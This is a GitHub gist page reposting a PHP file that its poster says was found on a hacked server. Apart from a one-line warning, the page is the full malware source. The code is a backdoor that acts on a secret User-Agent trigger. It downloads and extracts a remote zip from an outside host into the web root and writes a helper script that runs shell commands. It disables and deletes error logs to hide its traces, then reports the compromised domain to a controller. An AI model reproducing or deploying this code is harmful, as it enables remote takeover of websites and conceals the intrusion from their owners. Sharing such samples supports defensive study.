Skip to content

Instantly share code, notes, and snippets.

@fqx

fqx/htaccess.php

Created June 29, 2020 13:56
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save fqx/b43b16329e1da1119cf16f05900a3d34 to your computer and use it in GitHub Desktop.
Save fqx/b43b16329e1da1119cf16f05900a3d34 to your computer and use it in GitHub Desktop.
Download ZIP
WARNING! This is a hacked file found on my server!
Raw
htaccess.php
<?php
ignore_user_abort(true);
set_time_limit(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
function getURL($url, $maxRedirs = 5, $timeout = 30)
{
$ch = curl_init(); $header[] = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; $header[] = "Connection: keep-alive"; $header[] = "Keep-Alive: 300"; $header[] = "Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3"; $header[] = "Pragma: "; curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0"); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HTTPHEADER, $header); curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_AUTOREFERER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); $content = curl_exec($ch); $response = curl_getinfo($ch); curl_close ($ch); if (($response['http_code'] == 301 OR $response['http_code'] == 302) AND $maxRedirs) if ($headers = get_headers($response['url'])) foreach($headers as $value) if (substr( strtolower($value), 0, 9 ) == "location:") { $locationURL = trim(substr($value, 9, strlen($value))); if (!preg_match('/^http/', $locationURL)) { $arUrl = parse_url($url); $locationURL = $arUrl['scheme'] . '://' . $arUrl['host'] . $locationURL; } return getURL($locationURL, --$maxRedirs, $timeout); } return ($content) ? $content : false;
}
$UA = $_SERVER['HTTP_USER_AGENT'];
$status = stristr($UA, '~');
if ($status !== false)
{
$status_2 = stristr($UA, 'rvf');
if ($status_2 !== false)
{
$res = $UA;
$res = stristr($res, '~');
$res = substr($res, 1);
$pos_end = strpos($res, '~');
$res = substr_replace($res, '', $pos_end, 9999);
$status = explode(":", $res);
if ($status[0] == 'start')
{
$url_archive = 'http://joomlacheck.me/1.zip';
$dir_for_work = '/temp/';
$dir_path = $_SERVER['DOCUMENT_ROOT'].'/'.$dir_for_work;
$archive_path = $dir_path.'1.zip';
$script_name = $dir_path.'1.php';
if (!is_dir($dir_path))
mkdir($dir_path, 0777);
else
{
$arr_filename = array ();
if (is_dir($dir_path))
{
if ($dh = opendir($dir_path))
{
while (($file = readdir($dh)) !== false)
{
if (($file != ".") and ($file != "..")) $arr_filename[] = $file;
}
closedir($dh);
}
}
foreach ($arr_filename as $key)
{
$key = trim($key);
$file_for_delete = "$dir_path/$key";
$file_for_delete = str_replace('///', '/', $file_for_delete);
$file_for_delete = str_replace('//', '/', $file_for_delete);
$file_for_check = str_replace($_SERVER['DOCUMENT_ROOT'], '/', $file_for_delete);
$file_for_check = str_replace('//', '/', $file_for_check);
if (substr_count($file_for_check, "/") >=2)
{
if (file_exists($file_for_delete))
unlink($file_for_delete);
if (file_exists($file_for_delete))
{
chmod($file_for_delete, 0777);
unlink($file_for_delete);
}
}
}
if (file_exists("error_log"))
unlink("error_log");
if (is_dir($dir_path))
rmdir($dir_path);
if (!is_dir($dir_path))
mkdir($dir_path, 0777);
else
{
echo '~Directory already exists~';
exit;
}
}
if (is_dir($dir_path))
{
if (!copy($url_archive, $archive_path))
{
$arch = file_get_contents($url_archive);
if (($arch !== "") and ($arch !== " ") and ($arch !== null)) { $f = fopen ($archive_path, "w"); fwrite($f, $arch); fclose($f); } else { $ch = curl_init($url_archive); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); file_put_contents($archive_path, $data); } }
if (file_exists($archive_path))
{
$zip = new ZipArchive;
$zip->open("$archive_path");
$zip->extractTo("$dir_path");
$zip->close();
if (!file_exists($script_name))
{
$domain_name_2 = $_SERVER['SERVER_NAME'];
$unzip_path = $dir_path.'unzip.php';
$data1 = '<?php $archive_path = $_SERVER[\'DOCUMENT_ROOT\']';
$data2 = '.\'/';
$data3 = $dir_for_work;
$data4 = "1.zip';";
$data5 = '$output = shell_exec("unzip 1.zip");?>';
$data = $data1.$data2.$data3.$data4.$data5;
$fas = fopen ($unzip_path, "w");
fwrite($fas, $data);
fclose($fas);
$unzip_url = 'http://'.$domain_name_2.'/'.$status[1].'unzip.php';
echo getURL($unzip_url);
}
}
else
{
echo '~Can not upload archive!~';
rmdir($dir_path);
exit;
}
if (file_exists($script_name))
{
echo '~Client has been activated!~';
$file_name = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt';
$file = fopen($file_name,"rt");
$original_file = fread($file,filesize($file_name));
fclose($file);
$domain_name = $_SERVER['SERVER_NAME'];
$url = $original_file.'reciever.php?data='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'<hr>'; $data = file_get_contents($url); echo $data.'<hr>'; echo getURL($url); exit;
}
else
{
echo '~Can not unziped!~';
unlink($archive_path);
rmdir($dir_path);
exit;
}
}
else { echo '~Can not make dir!~'; exit; } } if ($status[0] == 'finish') { $file_name_2 = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file_2 = fopen($file_name_2,"rt"); $original_file_2 = fread($file_2,filesize($file_name_2)); fclose($file_2); if (($status[1] != null) and ($status[1] != '')) $dir_for_work = $status[1]; else $dir_for_work = 'conflg/'; $dir_path = $_SERVER['DOCUMENT_ROOT'].'/'.$dir_for_work; $archive_path = $dir_path.'1.zip'; if (is_dir($dir_path)) { $arr_filename = array (); if ($dh = opendir($dir_path)) { while (($file = readdir($dh)) !== false) { if (($file != ".") and ($file != "..")) $arr_filename[] = $file; } closedir($dh); } foreach ($arr_filename as $key) { $key = trim($key); $file_for_delete = "$dir_path/$key"; $file_for_delete = str_replace('///', '/', $file_for_delete); $file_for_delete = str_replace('//', '/', $file_for_delete); $file_for_check = str_replace($_SERVER['DOCUMENT_ROOT'], '/', $file_for_delete); $file_for_check = str_replace('//', '/', $file_for_check); if (substr_count($file_for_check, "/") >=2) { if (file_exists($file_for_delete)) unlink($file_for_delete); if (file_exists($file_for_delete)) { chmod($file_for_delete, 0777); unlink($file_for_delete); } } } } if (file_exists("error_log")) unlink("error_log"); if (is_dir($dir_path)) rmdir($dir_path); if (is_dir($dir_path)) { chmod($dir_path, 0777); rmdir($dir_path); } if (is_dir($dir_path)) echo "~Error!~"; else { $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file_2.'reciever.php?del='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'<hr>'; $data = file_get_contents($url); echo $data.'<hr>'; echo getURL($url); } exit; }
}
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment